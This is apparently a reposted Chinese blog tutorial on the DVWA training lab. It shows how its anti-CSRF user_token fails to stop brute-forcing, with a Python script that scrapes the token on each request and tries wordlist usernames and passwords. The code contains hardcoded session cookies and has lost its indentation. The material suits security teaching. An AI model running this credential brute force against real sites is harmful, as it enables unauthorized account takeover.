本文转载:https://xiaochuhe.blog.csdn.net/article/details/122546973
高机中加入Token预防CSRF,重定向我们通过bp抓包发现多了一个user_token参数:
在这里插入图片描述
继续使用上面的爆破方式,发现全部被重定向:
Token机制:
Token是服务端生成的一串字符串,以作客户端进行请求的一个令牌,当第一次登录后,服务器生成一个Token便将此Token返回给客户端,以后客户端只需带上这个Token前来请求数据即可,无需再次带上用户名和密码。
Token可以用于防护CSRF攻击,但不可以预防暴力破解,因为每次会话的Token都会发送至前端,只需要递归地在前端接收Token作为下次访问的Token值就可以实施暴力破解了。
代码如下:
#dvwa(hign)暴力破解程序
import re
import requests
with open("user.txt",'r') as file:
for username in file:
#print (username.strip())
with open("password.txt",'r') as passwd:
for password in passwd:
#print (password.strip())
url = "http://x.x.x.x/dvwa/dvwa/vulnerabilities/brute/"
header = {
'Cookie':'security=high; request_token=78gUEJrz2WPS3xN1XfqiXeGy2tgiHd8CxpzVAOSavBj4c8lA; pro_end=-1; ltd_end=-1; serverType=apache; order=id%20desc; memSize=1837; bt_user_info=%7B%22status%22%3Atrue%2C%22msg%22%3A%22%u83B7%u53D6%u6210%u529F%21%22%2C%22data%22%3A%7B%22username%22%3A%22151****1573%22%7D%7D; a3446a883d49d56e7e3ab64c9f2af2ad=d5a8f18a-489e-4beb-bca0-ee0272edea2f.b_FsvtXQq2JqFu6tBwn3MguJILs; JSESSIONID=B3B6110EF5A065700776C0554D642C4B; PHPSESSID=9cujklrgmm4qlsnhus8pa5ihbb'
}
r = requests.get(url=url,headers=header)
#print (r.text)
token = re.findall("<input type='hidden' name='user_token' value='(.*?)' />",r.text)[0]
#print (token)
url_last = url + '?username=' + username.strip() + '&password=' + password.strip() + '&Login=Login&user_token=' +token
#print (url_last)
res = requests.get(url=url_last,headers=header)
#print (res.url)
#print (res.text)
if not re.findall('Username and/or password incorrect.',res.text):
print ('破解成功啦,杀世子,夺青鸟!')
print ("用户名是:", username.strip())
print ("密码是:", password.strip())
输出结果: